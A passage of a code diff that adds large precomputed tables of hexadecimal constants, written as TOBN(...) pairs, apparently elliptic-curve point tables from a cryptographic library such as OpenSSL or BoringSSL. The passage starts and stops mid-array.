+     TOBN(0xeb7050c1, 0x80ef3000), TOBN(0x288d1c33, 0xeaa5b3f0),
+     TOBN(0xe87c68d6, 0x07806fd8), TOBN(0xb2f7f9d5, 0x4bbbf50f),
+     TOBN(0x25972f3a, 0xac8d6627), TOBN(0xf8547774, 0x10e8c13b),
+     TOBN(0xcc50ef6c, 0x872b4a60), TOBN(0xab2a34a4, 0x4613521b),
+     TOBN(0x39c5c190, 0x983e15d1), TOBN(0x61dde5df, 0x59905512),
+     TOBN(0xe417f621, 0x9f2275f3), TOBN(0x0750c8b6, 0x451d894b),
+     TOBN(0x75b04ab9, 0x78b0bdaa), TOBN(0x3bfd9fd4, 0x458589bd),
+     TOBN(0xf1013e30, 0xee9120b6), TOBN(0x2b51af93, 0x23a4743e),
+     TOBN(0xea96ffae, 0x48d14d9e), TOBN(0x71dc0dbe, 0x698a1d32),
+     TOBN(0x914962d2, 0x0180cca4), TOBN(0x1ae60677, 0xc3568963),
+     TOBN(0x8cf227b1, 0x437bc444), TOBN(0xc650c83b, 0xc9962c7a),
+     TOBN(0x23c2c7dd, 0xfe7ccfc4), TOBN(0xf925c89d, 0x1b929d48),
+     TOBN(0x4460f74b, 0x06783c33), TOBN(0xac2c8d49, 0xa590475a),
+     TOBN(0xfb40b407, 0xb807bba0), TOBN(0x9d1e362d, 0x69ff8f3a),
+     TOBN(0xa33e9681, 0xcbef64a4), TOBN(0x67ece5fa, 0x332fb4b2),
+     TOBN(0x6900a99b, 0x739f10e3), TOBN(0xc3341ca9, 0xff525925),
+     TOBN(0xee18a626, 0xa9e2d041), TOBN(0xa5a83685, 0x29580ddd),
+     TOBN(0xf3470c81, 0x9d7de3cd), TOBN(0xedf02586, 0x2062cf9c),
+     TOBN(0xf43522fa, 0xc010edb0), TOBN(0x30314135, 0x13a4b1ae),
+     TOBN(0xc792e02a, 0xdb22b94b), TOBN(0x993d8ae9, 0xa1eaa45b),
+     TOBN(0x8aad6cd3, 0xcd1e1c63), TOBN(0x89529ca7, 0xc5ce688a),
+     TOBN(0x2ccee3aa, 0xe572a253), TOBN(0xe02b6438, 0x02a21efb),
+     TOBN(0xa7091b6e, 0xc9430358), TOBN(0x06d1b1fa, 0x9d7db504),
+     TOBN(0x58846d32, 0xc4744733), TOBN(0x40517c71, 0x379f9e34),
+     TOBN(0x2f65655f, 0x130ef6ca), TOBN(0x526e4488, 0xf1f3503f),
+     TOBN(0x8467bd17, 0x7ee4a976), TOBN(0x1d9dc913, 0x921363d1),
+     TOBN(0xd8d24c33, 0xb069e041), TOBN(0x5eb5da0a, 0x2cdf7f51),
+     TOBN(0x1c0f3cb1, 0x197b994f), TOBN(0x3c95a6c5, 0x2843eae9),
+     TOBN(0x7766ffc9, 0xa6097ea5), TOBN(0x7bea4093, 0xd723b867),
+     TOBN(0xb48e1f73, 0x4db378f9), TOBN(0x70025b00, 0xe37b77ac),
+     TOBN(0x943dc8e7, 0xaf24ad46), TOBN(0xb98a15ac, 0x16d00a85),
+     TOBN(0x3adc38ba, 0x2743b004), TOBN(0xb1c7f4f7, 0x334415ee),
+     TOBN(0xea43df8f, 0x1e62d05a), TOBN(0x32618905, 0x9d76a3b6),
+     TOBN(0x2fbd0bb5, 0xa23a0f46), TOBN(0x5bc971db, 0x6a01918c),
+     TOBN(0x7801d94a, 0xb4743f94), TOBN(0xb94df65e, 0x676ae22b),
+     TOBN(0xaafcbfab, 0xaf95894c), TOBN(0x7b9bdc07, 0x276b2241),
+     TOBN(0xeaf98362, 0x5bdda48b), TOBN(0x5977faf2, 0xa3fcb4df),
+     TOBN(0xbed042ef, 0x052c4b5b), TOBN(0x9fe87f71, 0x067591f0),
+     TOBN(0xc89c73ca, 0x22f24ec7), TOBN(0x7d37fa9e, 0xe64a9f1b),
+     TOBN(0x2710841a, 0x15562627), TOBN(0x2c01a613, 0xc243b034),
+     TOBN(0x1d135c56, 0x2bc68609), TOBN(0xc2ca1715, 0x8b03f1f6),
+     TOBN(0xc9966c2d, 0x3eb81d82), TOBN(0xc02abf4a, 0x8f6df13e),
+     TOBN(0x77b34bd7, 0x8f72b43b), TOBN(0xaff6218f, 0x360c82b0),
+     TOBN(0x0aa5726c, 0x8d55b9d2), TOBN(0xdc0adbe9, 0x99e9bffb),
+     TOBN(0x9097549c, 0xefb9e72a), TOBN(0x16755712, 0x9dfb3111),
+     TOBN(0xdd8bf984, 0xf26847f9), TOBN(0xbcb8e387, 0xdfb30cb7),
+     TOBN(0xc1fd32a7, 0x5171ef9c), TOBN(0x977f3fc7, 0x389b363f),
+     TOBN(0x116eaf2b, 0xf4babda0), TOBN(0xfeab68bd, 0xf7113c8e),
+     TOBN(0xd1e3f064, 0xb7def526), TOBN(0x1ac30885, 0xe0b3fa02),
+     TOBN(0x1c5a6e7b, 0x40142d9d), TOBN(0x839b5603, 0x30921c0b),
+     TOBN(0x48f301fa, 0x36a116a3), TOBN(0x380e1107, 0xcfd9ee6d),
+     TOBN(0x7945ead8, 0x58854be1), TOBN(0x4111c12e, 0xcbd4d49d),
+     TOBN(0xece3b1ec, 0x3a29c2ef), TOBN(0x6356d404, 0x8d3616f5),
+     TOBN(0x9f0d6a8f, 0x594d320e), TOBN(0x0989316d, 0xf651ccd2),
+     TOBN(0x6c32117a, 0x0f8fdde4), TOBN(0x9abe5cc5, 0xa26a9bbc),
+     TOBN(0xcff560fb, 0x9723f671), TOBN(0x21b2a12d, 0x7f3d593c),
+     TOBN(0xe4cb18da, 0x24ba0696), TOBN(0x186e2220, 0xc3543384),
+     TOBN(0x722f64e0, 0x88312c29), TOBN(0x94282a99, 0x17dc7752),
+     TOBN(0x62467bbf, 0x5a85ee89), TOBN(0xf435c650, 0xf10076a0),
+     TOBN(0xc9ff1539, 0x43b3a50b), TOBN(0x7132130c, 0x1a53efbc),
+     TOBN(0x31bfe063, 0xf7b0c5b7), TOBN(0xb0179a7d, 0x4ea994cc),
+     TOBN(0x12d064b3, 0xc85f455b), TOBN(0x47259328, 0x8f6e0062),
+     TOBN(0xf64e590b, 0xb875d6d9), TOBN(0x22dd6225, 0xad92bcc7),
+     TOBN(0xb658038e, 0xb9c3bd6d), TOBN(0x00cdb0d6, 0xfbba27c8),
+     TOBN(0x0c681337, 0x1062c45d), TOBN(0xd8515b8c, 0x2d33407d),
+     TOBN(0xcb8f699e, 0x8cbb5ecf), TOBN(0x8c4347f8, 0xc608d7d8),
+     TOBN(0x2c11850a, 0xbb3e00db), TOBN(0x20a8dafd, 0xecb49d19),
+     TOBN(0xbd781480, 0x45ee2f40), TOBN(0x75e354af, 0x416b60cf),
+     TOBN(0xde0b58a1, 0x8d49a8c4), TOBN(0xe40e94e2, 0xfa359536),
+     TOBN(0xbd4fa59f, 0x62accd76), TOBN(0x05cf466a, 0x8c762837),
+     TOBN(0xb5abda99, 0x448c277b), TOBN(0x5a9e01bf, 0x48b13740),
+     TOBN(0x9d457798, 0x326aad8d), TOBN(0xbdef4954, 0xc396f7e7),
+     TOBN(0x6fb274a2, 0xc253e292), TOBN(0x2800bf0a, 0x1cfe53e7),
+     TOBN(0x22426d31, 0x44438fd4), TOBN(0xef233923, 0x5e259f9a),
+     TOBN(0x4188503c, 0x03f66264), TOBN(0x9e5e7f13, 0x7f9fdfab),
+     TOBN(0x565eb76c, 0x5fcc1aba), TOBN(0xea632548, 0x59b5bff8),
+     TOBN(0x5587c087, 0xaab6d3fa), TOBN(0x92b639ea, 0x6ce39c1b),
+     TOBN(0x0706e782, 0x953b135c), TOBN(0x7308912e, 0x425268ef),
+     TOBN(0x599e92c7, 0x090e7469), TOBN(0x83b90f52, 0x9bc35e75),
+     TOBN(0x4750b3d0, 0x244975b3), TOBN(0xf3a44358, 0x11965d72),
+     TOBN(0x179c6774, 0x9c8dc751), TOBN(0xff18cdfe, 0xd23d9ff0),
+     TOBN(0xc4013833, 0x2028e247), TOBN(0x96e280e2, 0xf3bfbc79),
+     TOBN(0xf60417bd, 0xd0880a84), TOBN(0x263c9f3d, 0x2a568151),
+     TOBN(0x36be15b3, 0x2d2ce811), TOBN(0x846dc0c2, 0xf8291d21),
+     TOBN(0x5cfa0ecb, 0x789fcfdb), TOBN(0x45a0beed, 0xd7535b9a),
+     TOBN(0xec8e9f07, 0x96d69af1), TOBN(0x31a7c5b8, 0x599ab6dc),
+     TOBN(0xd36d45ef, 0xf9e2e09f), TOBN(0x3cf49ef1, 0xdcee954b),
+     TOBN(0x6be34cf3, 0x086cff9b), TOBN(0x88dbd491, 0x39a3360f),
+     TOBN(0x1e96b8cc, 0x0dbfbd1d), TOBN(0xc1e5f7bf, 0xcb7e2552),
+     TOBN(0x0547b214, 0x28819d98), TOBN(0xc770dd9c, 0x7aea9dcb),
+     TOBN(0xaef0d4c7, 0x041d68c8), TOBN(0xcc2b9818, 0x13cb9ba8),
+     TOBN(0x7fc7bc76, 0xfe86c607), TOBN(0x6b7b9337, 0x502a9a95),
+     TOBN(0x1948dc27, 0xd14dab63), TOBN(0x249dd198, 0xdae047be),
+     TOBN(0xe8356584, 0xa981a202), TOBN(0x3531dd18, 0x3a893387),
+     TOBN(0x1be11f90, 0xc85c7209), TOBN(0x93d2fe1e, 0xe2a52b5a),
+     TOBN(0x8225bfe2, 0xec6d6b97), TOBN(0x9cf6d6f4, 0xbd0aa5de),
+     TOBN(0x911459cb, 0x54779f5f), TOBN(0x5649cddb, 0x86aeb1f3),
+     TOBN(0x32133579, 0x3f26ce5a), TOBN(0xc289a102, 0x550f431e),
+     TOBN(0x559dcfda, 0x73b84c6f), TOBN(0x84973819, 0xee3ac4d7),
+     TOBN(0xb51e55e6, 0xf2606a82), TOBN(0xe25f7061, 0x90f2fb57),
+     TOBN(0xacef6c2a, 0xb1a4e37c), TOBN(0x864e359d, 0x5dcf2706),
+     TOBN(0x479e6b18, 0x7ce57316), TOBN(0x2cab2500, 0x3a96b23d),
+     TOBN(0xed489862, 0x8ef16df7), TOBN(0x2056538c, 0xef3758b5),
+     TOBN(0xa7df865e, 0xf15d3101), TOBN(0x80c5533a, 0x61b553d7),
+     TOBN(0x366e1997, 0x4ed14294), TOBN(0x6620741f, 0xb3c0bcd6),
+     TOBN(0x21d1d9c4, 0xedc45418), TOBN(0x005b859e, 0xc1cc4a9d),
+     TOBN(0xdf01f630, 0xa1c462f0), TOBN(0x15d06cf3, 0xf26820c7),
+     TOBN(0x9f7f24ee, 0x3484be47), TOBN(0x2ff33e96, 0x4a0c902f),
+     TOBN(0x00bdf457, 0x5a0bc453), TOBN(0x2378dfaf, 0x1aa238db),
+     TOBN(0x272420ec, 0x856720f2), TOBN(0x2ad9d95b, 0x96797291),
+     TOBN(0xd1242cc6, 0x768a1558), TOBN(0x2e287f8b, 0x5cc86aa8),
+     TOBN(0x796873d0, 0x990cecaa), TOBN(0xade55f81, 0x675d4080),
+     TOBN(0x2645eea3, 0x21f0cd84), TOBN(0x7a1efa0f, 0xb4e17d02),
+     TOBN(0xf6858420, 0x037cc061), TOBN(0x682e05f0, 0xd5d43e12),
+     TOBN(0x59c36994, 0x27218710), TOBN(0x85cbba4d, 0x3f7cd2fc),
+     TOBN(0x726f9729, 0x7a3cd22a), TOBN(0x9f8cd5dc, 0x4a628397),
+     TOBN(0x17b93ab9, 0xc23165ed), TOBN(0xff5f5dbf, 0x122823d4),
+     TOBN(0xc1e4e4b5, 0x654a446d), TOBN(0xd1a9496f, 0x677257ba),
+     TOBN(0x6387ba94, 0xde766a56), TOBN(0x23608bc8, 0x521ec74a),
+     TOBN(0x16a522d7, 0x6688c4d4), TOBN(0x9d6b4282, 0x07373abd),
+     TOBN(0xa62f07ac, 0xb42efaa3), TOBN(0xf73e00f7, 0xe3b90180),
+     TOBN(0x36175fec, 0x49421c3e), TOBN(0xc4e44f9b, 0x3dcf2678),
+     TOBN(0x76df436b, 0x7220f09f), TOBN(0x172755fb, 0x3aa8b6cf),
+     TOBN(0xbab89d57, 0x446139cc), TOBN(0x0a0a6e02, 0x5fe0208f),
+     TOBN(0xcdbb63e2, 0x11e5d399), TOBN(0x33ecaa12, 0xa8977f0b),
+     TOBN(0x59598b21, 0xf7c42664), TOBN(0xb3e91b32, 0xab65d08a),
+     TOBN(0x035822ee, 0xf4502526), TOBN(0x1dcf0176, 0x720a82a9),
+     TOBN(0x50f8598f, 0x3d589e02), TOBN(0xdf0478ff, 0xb1d63d2c),
+     TOBN(0x8b8068bd, 0x1571cd07), TOBN(0x30c3aa4f, 0xd79670cd),
+     TOBN(0x25e8fd4b, 0x941ade7f), TOBN(0x3d1debdc, 0x32790011),
+     TOBN(0x65b6dcbd, 0x3a3f9ff0), TOBN(0x282736a4, 0x793de69c),
+     TOBN(0xef69a0c3, 0xd41d3bd3), TOBN(0xb533b8c9, 0x07a26bde),
+     TOBN(0xe2801d97, 0xdb2edf9f), TOBN(0xdc4a8269, 0xe1877af0),
+     TOBN(0x6c1c5851, 0x3d590dbe), TOBN(0x84632f6b, 0xee4e9357),
+     TOBN(0xd36d36b7, 0x79b33374), TOBN(0xb46833e3, 0x9bbca2e6),
+     TOBN(0x37893913, 0xf7fc0586), TOBN(0x385315f7, 0x66bf4719),
+     TOBN(0x72c56293, 0xb31855dc), TOBN(0xd1416d4e, 0x849061fe),
+     TOBN(0xbeb3ab78, 0x51047213), TOBN(0x447f6e61, 0xf040c996),
+     TOBN(0xd06d310d, 0x638b1d0c), TOBN(0xe28a413f, 0xbad1522e),
+     TOBN(0x685a76cb, 0x82003f86), TOBN(0x610d07f7, 0x0bcdbca3),
+     TOBN(0x6ff66021, 0x9ca4c455), TOBN(0x7df39b87, 0xcea10eec),
+     TOBN(0xb9255f96, 0xe22db218), TOBN(0x8cc6d9eb, 0x08a34c44),
+     TOBN(0xcd4ffb86, 0x859f9276), TOBN(0x8fa15eb2, 0x50d07335),
+     TOBN(0xdf553845, 0xcf2c24b5), TOBN(0x89f66a9f, 0x52f9c3ba),
+     TOBN(0x8f22b5b9, 0xe4a7ceb3), TOBN(0xaffef809, 0x0e134686),
+     TOBN(0x3e53e1c6, 0x8eb8fac2), TOBN(0x93c1e4eb, 0x28aec98e),
+     TOBN(0xb6b91ec5, 0x32a43bcb), TOBN(0x2dbfa947, 0xb2d74a51),
+     TOBN(0xe065d190, 0xca84bad7), TOBN(0xfb13919f, 0xad58e65c),
+     TOBN(0x3c41718b, 0xf1cb6e31), TOBN(0x688969f0, 0x06d05c3f),
+     TOBN(0xd4f94ce7, 0x21264d45), TOBN(0xfdfb65e9, 0x7367532b),
+     TOBN(0x5b1be8b1, 0x0945a39d), TOBN(0x229f789c, 0x2b8baf3b),
+     TOBN(0xd8f41f3e, 0x6f49f15d), TOBN(0x678ce828, 0x907f0792),
+     TOBN(0xc69ace82, 0xfca6e867), TOBN(0x106451ae, 0xd01dcc89),
+     TOBN(0x1bb4f7f0, 0x19fc32d2), TOBN(0x64633dfc, 0xb00c52d2),
+     TOBN(0x8f13549a, 0xad9ea445), TOBN(0x99a3bf50, 0xfb323705),
+     TOBN(0x0c9625a2, 0x534d4dbc), TOBN(0x45b8f1d1, 0xc2a2fea3),
+     TOBN(0x76ec21a1, 0xa530fc1a), TOBN(0x4bac9c2a, 0x9e5bd734),
+     TOBN(0x5996d76a, 0x7b4e3587), TOBN(0x0045cdee, 0x1182d9e3),
+     TOBN(0x1aee24b9, 0x1207f13d), TOBN(0x66452e97, 0x97345a41),
+     TOBN(0x16e5b054, 0x9f950cd0), TOBN(0x9cc72fb1, 0xd7fdd075),
+     TOBN(0x6edd61e7, 0x66249663), TOBN(0xde4caa4d, 0xf043cccb),
+     TOBN(0x11b1f57a, 0x55c7ac17), TOBN(0x779cbd44, 0x1a85e24d),
+     TOBN(0x78030f86, 0xe46081e7), TOBN(0xfd4a6032, 0x8e20f643),
+     TOBN(0xcc7a6488, 0x0a750c0f), TOBN(0x39bacfe3, 0x4e548e83),
+     TOBN(0x3d418c76, 0x0c110f05), TOBN(0x3e4daa4c, 0xb1f11588),
+     TOBN(0x2733e7b5, 0x5ffc69ff), TOBN(0x46f147bc, 0x92053127),
+     TOBN(0x885b2434, 0xd722df94), TOBN(0x6a444f65, 0xe6fc6b7c)}
+    ,
+    {TOBN(0x7a1a465a, 0xc3f16ea8), TOBN(0x115a461d, 0xb2f1d11c),
+     TOBN(0x4767dd95, 0x6c68a172), TOBN(0x3392f2eb, 0xd13a4698),
+     TOBN(0xc7a99ccd, 0xe526cdc7), TOBN(0x8e537fdc, 0x22292b81),
+     TOBN(0x76d8cf69, 0xa6d39198), TOBN(0xffc5ff43, 0x2446852d),
+     TOBN(0x97b14f7e, 0xa90567e6), TOBN(0x513257b7, 0xb6ae5cb7),
+     TOBN(0x85454a3c, 0x9f10903d), TOBN(0xd8d2c9ad, 0x69bc3724),
+     TOBN(0x38da9324, 0x6b29cb44), TOBN(0xb540a21d, 0x77c8cbac),
+     TOBN(0x9bbfe435, 0x01918e42), TOBN(0xfffa707a, 0x56c3614e),
+     TOBN(0x0ce4e3f1, 0xd4e353b7), TOBN(0x062d8a14, 0xef46b0a0),
+     TOBN(0x6408d5ab, 0x574b73fd), TOBN(0xbc41d1c9, 0xd3273ffd),
+     TOBN(0x3538e1e7, 0x6be77800), TOBN(0x71fe8b37, 0xc5655031),
+     TOBN(0x1cd91621, 0x6b9b331a), TOBN(0xad825d0b, 0xbb388f73),
+     TOBN(0x56c2e05b, 0x1cb76219), TOBN(0x0ec0bf91, 0x71567e7e),
+     TOBN(0xe7076f86, 0x61c4c910), TOBN(0xd67b085b, 0xbabc04d9),
+     TOBN(0x9fb90459, 0x5e93a96a), TOBN(0x7526c1ea, 0xfbdc249a),
+     TOBN(0x0d44d367, 0xecdd0bb7), TOBN(0x95399917, 0x9dc0d695),
+     TOBN(0x61360ee9, 0x9e240d18), TOBN(0x057cdcac, 0xb4b94466),
+     TOBN(0xe7667cd1, 0x2fe5325c), TOBN(0x1fa297b5, 0x21974e3b),
+     TOBN(0xfa4081e7, 0xdb083d76), TOBN(0x31993be6, 0xf206bd15),
+     TOBN(0x8949269b, 0x14c19f8c), TOBN(0x21468d72, 0xa9d92357),
+     TOBN(0x2ccbc583, 0xa4c506ec), TOBN(0x957ed188, 0xd1acfe97),
+     TOBN(0x8baed833, 0x12f1aea2), TOBN(0xef2a6cb4, 0x8325362d),
+     TOBN(0x130dde42, 0x8e195c43), TOBN(0xc842025a, 0x0e6050c6),
+     TOBN(0x2da972a7, 0x08686a5d), TOBN(0xb52999a1, 0xe508b4a8),
+     TOBN(0xd9f090b9, 0x10a5a8bd), TOBN(0xca91d249, 0x096864da),
+     TOBN(0x8e6a93be, 0x3f67dbc1), TOBN(0xacae6fba, 0xf5f4764c),
+     TOBN(0x1563c6e0, 0xd21411a0), TOBN(0x28fa787f, 0xda0a4ad8),
+     TOBN(0xd524491c, 0x908c8030), TOBN(0x1257ba0e, 0x4c795f07),
+     TOBN(0x83f49167, 0xceca9754), TOBN(0x426d2cf6, 0x4b7939a0),
+     TOBN(0x2555e355, 0x723fd0bf), TOBN(0xa96e6d06, 0xc4f144e2),
+     TOBN(0x4768a8dd, 0x87880e61), TOBN(0x15543815, 0xe508e4d5),
+     TOBN(0x09d7e772, 0xb1b65e15), TOBN(0x63439dd6, 0xac302fa0),
+     TOBN(0xb93f802f, 0xc14e35c2), TOBN(0x71735b7c, 0x4341333c),
+     TOBN(0x03a25104, 0x16d4f362), TOBN(0x3f4d069b, 0xbf433c8e),
+     TOBN(0x0d83ae01, 0xf78f5a7c), TOBN(0x50a8ffbe, 0x7c4eed07),
+     TOBN(0xc74f8906, 0x76e10f83), TOBN(0x7d080966, 0x9ddaf8e1),
+     TOBN(0xb11df8e1, 0x698e04cc), TOBN(0x877be203, 0x169005c8),
+     TOBN(0x32749e8c, 0x4f3c6179), TOBN(0x2dbc9d0a, 0x7853fc05),
+     TOBN(0x187d4f93, 0x9454d937), TOBN(0xe682ce9d, 0xb4800e1b),
+     TOBN(0xa9129ad8, 0x165e68e8), TOBN(0x0fe29735, 0xbe7f785b),
+     TOBN(0x5303f40c, 0x5b9e02b7), TOBN(0xa37c9692, 0x35ee04e8),
+     TOBN(0x5f46cc20, 0x34d6632b), TOBN(0x55ef72b2, 0x96ac545b),
+     TOBN(0xabec5c1f, 0x7b91b062), TOBN(0x0a79e1c7, 0xbb33e821),
+     TOBN(0xbb04b428, 0x3a9f4117), TOBN(0x0de1f28f, 0xfd2a475a),
+     TOBN(0x31019ccf, 0x3a4434b4), TOBN(0xa3458111, 0x1a7954dc),
+     TOBN(0xa9dac80d, 0xe34972a7), TOBN(0xb043d054, 0x74f6b8dd),
+     TOBN(0x021c319e, 0x11137b1a), TOBN(0x00a754ce, 0xed5cc03f),
+     TOBN(0x0aa2c794, 0xcbea5ad4), TOBN(0x093e67f4, 0x70c015b6),
+     TOBN(0x72cdfee9, 0xc97e3f6b), TOBN(0xc10bcab4, 0xb6da7461),
+     TOBN(0x3b02d2fc, 0xb59806b9), TOBN(0x85185e89, 0xa1de6f47),
+     TOBN(0x39e6931f, 0x0eb6c4d4), TOBN(0x4d4440bd, 0xd4fa5b04),
+     TOBN(0x5418786e, 0x34be7eb8), TOBN(0x6380e521, 0x9d7259bc),
+     TOBN(0x20ac0351, 0xd598d710), TOBN(0x272c4166, 0xcb3a4da4),
+     TOBN(0xdb82fe1a, 0xca71de1f), TOBN(0x746e79f2, 0xd8f54b0f),
+     TOBN(0x6e7fc736, 0x4b573e9b), TOBN(0x75d03f46, 0xfd4b5040),
+     TOBN(0x5c1cc36d, 0x0b98d87b), TOBN(0x513ba3f1, 0x1f472da1),
+     TOBN(0x79d0af26, 0xabb177dd), TOBN(0xf82ab568, 0x7891d564),
+     TOBN(0x2b6768a9, 0x72232173), TOBN(0xefbb3bb0, 0x8c1f6619),
+     TOBN(0xb29c11db, 0xa6d18358), TOBN(0x519e2797, 0xb0916d3a),
+     TOBN(0xd4dc18f0, 0x9188e290), TOBN(0x648e86e3, 0x98b0ca7f),
+     TOBN(0x859d3145, 0x983c38b5), TOBN(0xb14f176c, 0x637abc8b),
+     TOBN(0x2793fb9d, 0xcaff7be6), TOBN(0xebe5a55f, 0x35a66a5a),
+     TOBN(0x7cec1dcd, 0x9f87dc59), TOBN(0x7c595cd3, 0xfbdbf560),
+     TOBN(0x5b543b22, 0x26eb3257), TOBN(0x69080646, 0xc4c935fd),
+     TOBN(0x7f2e4403, 0x81e9ede3), TOBN(0x243c3894, 0xcaf6df0a),
+     TOBN(0x7c605bb1, 0x1c073b11), TOBN(0xcd06a541, 0xba6a4a62),
+     TOBN(0x29168949, 0x49d4e2e5), TOBN(0x33649d07, 0x4af66880),
+     TOBN(0xbfc0c885, 0xe9a85035), TOBN(0xb4e52113, 0xfc410f4b),
+     TOBN(0xdca3b706, 0x78a6513b), TOBN(0x92ea4a2a, 0x9edb1943),
+     TOBN(0x02642216, 0xdb6e2dd8), TOBN(0x9b45d0b4, 0x9fd57894),
+     TOBN(0x114e70db, 0xc69d11ae), TOBN(0x1477dd19, 0x4c57595f),
+     TOBN(0xbc2208b4, 0xec77c272), TOBN(0x95c5b4d7, 0xdb68f59c),
+     TOBN(0xb8c4fc63, 0x42e532b7), TOBN(0x386ba422, 0x9ae35290),
+     TOBN(0xfb5dda42, 0xd201ecbc), TOBN(0x2353dc8b, 0xa0e38fd6),
+     TOBN(0x9a0b85ea, 0x68f7e978), TOBN(0x96ec5682, 0x2ad6d11f),
+     TOBN(0x5e279d6c, 0xe5f6886d), TOBN(0xd3fe03cd, 0x3cb1914d),
+     TOBN(0xfe541fa4, 0x7ea67c77), TOBN(0x952bd2af, 0xe3ea810c),
+     TOBN(0x791fef56, 0x8d01d374), TOBN(0xa3a1c621, 0x0f11336e),
+     TOBN(0x5ad0d5a9, 0xc7ec6d79), TOBN(0xff7038af, 0x3225c342),
+     TOBN(0x003c6689, 0xbc69601b), TOBN(0x25059bc7, 0x45e8747d),
+     TOBN(0xfa4965b2, 0xf2086fbf), TOBN(0xf6840ea6, 0x86916078),
+     TOBN(0xd7ac7620, 0x70081d6c), TOBN(0xe600da31, 0xb5328645),
+     TOBN(0x01916f63, 0x529b8a80), TOBN(0xe80e4858, 0x2d7d6f3e),
+     TOBN(0x29eb0fe8, 0xd664ca7c), TOBN(0xf017637b, 0xe7b43b0c),
+     TOBN(0x9a75c806, 0x76cb2566), TOBN(0x8f76acb1, 0xb24892d9),
+     TOBN(0x7ae7b9cc, 0x1f08fe45), TOBN(0x19ef7329, 0x6a4907d8),
+     TOBN(0x2db4ab71, 0x5f228bf0), TOBN(0xf3cdea39, 0x817032d7),
+     TOBN(0x0b1f482e, 0xdcabe3c0), TOBN(0x3baf76b4, 0xbb86325c),
+     TOBN(0xd49065e0, 0x10089465), TOBN(0x3bab5d29, 0x8e77c596),
+     TOBN(0x7636c3a6, 0x193dbd95), TOBN(0xdef5d294, 0xb246e499),
+     TOBN(0xb22c58b9, 0x286b2475), TOBN(0xa0b93939, 0xcd80862b),
+     TOBN(0x3002c83a, 0xf0992388), TOBN(0x6de01f9b, 0xeacbe14c),
+     TOBN(0x6aac688e, 0xadd70482), TOBN(0x708de92a, 0x7b4a4e8a),
+     TOBN(0x75b6dd73, 0x758a6eef), TOBN(0xea4bf352, 0x725b3c43),
+     TOBN(0x10041f2c, 0x87912868), TOBN(0xb1b1be95, 0xef09297a),
+     TOBN(0x19ae23c5, 0xa9f3860a), TOBN(0xc4f0f839, 0x515dcf4b),
+     TOBN(0x3c7ecca3, 0x97f6306a), TOBN(0x744c44ae, 0x68a3a4b0),
+     TOBN(0x69cd13a0, 0xb3a1d8a2), TOBN(0x7cad0a1e, 0x5256b578),
+     TOBN(0xea653fcd, 0x33791d9e), TOBN(0x9cc2a05d, 0x74b2e05f),
+     TOBN(0x73b391dc, 0xfd7affa2), TOBN(0xddb7091e, 0xb6b05442),
+     TOBN(0xc71e27bf, 0x8538a5c6), TOBN(0x195c63dd, 0x89abff17),
+     TOBN(0xfd315285, 0x1b71e3da), TOBN(0x9cbdfda7, 0xfa680fa0),
+     TOBN(0x9db876ca, 0x849d7eab), TOBN(0xebe2764b, 0x3c273271),
+     TOBN(0x663357e3, 0xf208dcea), TOBN(0x8c5bd833, 0x565b1b70),
+     TOBN(0xccc3b4f5, 0x9837fc0d), TOBN(0x9b641ba8, 0xa79cf00f),
+     TOBN(0x7428243d, 0xdfdf3990), TOBN(0x83a594c4, 0x020786b1),
+     TOBN(0xb712451a, 0x526c4502), TOBN(0x9d39438e, 0x6adb3f93),
+     TOBN(0xfdb261e3, 0xe9ff0ccd), TOBN(0x80344e3c, 0xe07af4c3),
+     TOBN(0x75900d7c, 0x2fa4f126), TOBN(0x08a3b865, 0x5c99a232),
+     TOBN(0x2478b6bf, 0xdb25e0c3), TOBN(0x482cc2c2, 0x71db2edf),
+     TOBN(0x37df7e64, 0x5f321bb8), TOBN(0x8a93821b, 0x9a8005b4),
+     TOBN(0x3fa2f10c, 0xcc8c1958), TOBN(0x0d332218, 0x2c269d0a),
+     TOBN(0x20ab8119, 0xe246b0e6), TOBN(0xb39781e4, 0xd349fd17),
+     TOBN(0xd293231e, 0xb31aa100), TOBN(0x4b779c97, 0xbb032168),
+     TOBN(0x4b3f19e1, 0xc8470500), TOBN(0x45b7efe9, 0x0c4c869d),
+     TOBN(0xdb84f38a, 0xa1a6bbcc), TOBN(0x3b59cb15, 0xb2fddbc1),
+     TOBN(0xba5514df, 0x3fd165e8), TOBN(0x499fd6a9, 0x061f8811),
+     TOBN(0x72cd1fe0, 0xbfef9f00), TOBN(0x120a4bb9, 0x79ad7e8a),
+     TOBN(0xf2ffd095, 0x5f4a5ac5), TOBN(0xcfd174f1, 0x95a7a2f0),
+     TOBN(0xd42301ba, 0x9d17baf1), TOBN(0xd2fa487a, 0x77f22089),
+     TOBN(0x9cb09efe, 0xb1dc77e1), TOBN(0xe9566939, 0x21c99682),
+     TOBN(0x8c546901, 0x6c6067bb), TOBN(0xfd378574, 0x61c24456),
+     TOBN(0x2b6a6cbe, 0x81796b33), TOBN(0x62d550f6, 0x58e87f8b),
+     TOBN(0x1b763e1c, 0x7f1b01b4), TOBN(0x4b93cfea, 0x1b1b5e12),
+     TOBN(0xb9345238, 0x1d531696), TOBN(0x57201c00, 0x88cdde69),
+     TOBN(0xdde92251, 0x9a86afc7), TOBN(0xe3043895, 0xbd35cea8),
+     TOBN(0x7608c1e1, 0x8555970d), TOBN(0x8267dfa9, 0x2535935e),
+     TOBN(0xd4c60a57, 0x322ea38b), TOBN(0xe0bf7977, 0x804ef8b5),
+     TOBN(0x1a0dab28, 0xc06fece4), TOBN(0xd405991e, 0x94e7b49d),
+     TOBN(0xc542b6d2, 0x706dab28), TOBN(0xcb228da3, 0xa91618fb),
+     TOBN(0x224e4164, 0x107d1cea), TOBN(0xeb9fdab3, 0xd0f5d8f1),
+     TOBN(0xc02ba386, 0x0d6e41cd), TOBN(0x676a72c5, 0x9b1f7146),
+     TOBN(0xffd6dd98, 0x4d6cb00b), TOBN(0xcef9c5ca, 0xde2e8d7c),
+     TOBN(0xa1bbf5d7, 0x641c7936), TOBN(0x1b95b230, 0xee8f772e),
+     TOBN(0xf765a92e, 0xe8ac25b1), TOBN(0xceb04cfc, 0x3a18b7c6),
+     TOBN(0x27944cef, 0x0acc8966), TOBN(0xcbb3c957, 0x434c1004),
+     TOBN(0x9c9971a1, 0xa43ff93c), TOBN(0x5bc2db17, 0xa1e358a9),
+     TOBN(0x45b4862e, 0xa8d9bc82), TOBN(0x70ebfbfb, 0x2201e052),
+     TOBN(0xafdf64c7, 0x92871591), TOBN(0xea5bcae6, 0xb42d0219),
+     TOBN(0xde536c55, 0x2ad8f03c), TOBN(0xcd6c3f4d, 0xa76aa33c),
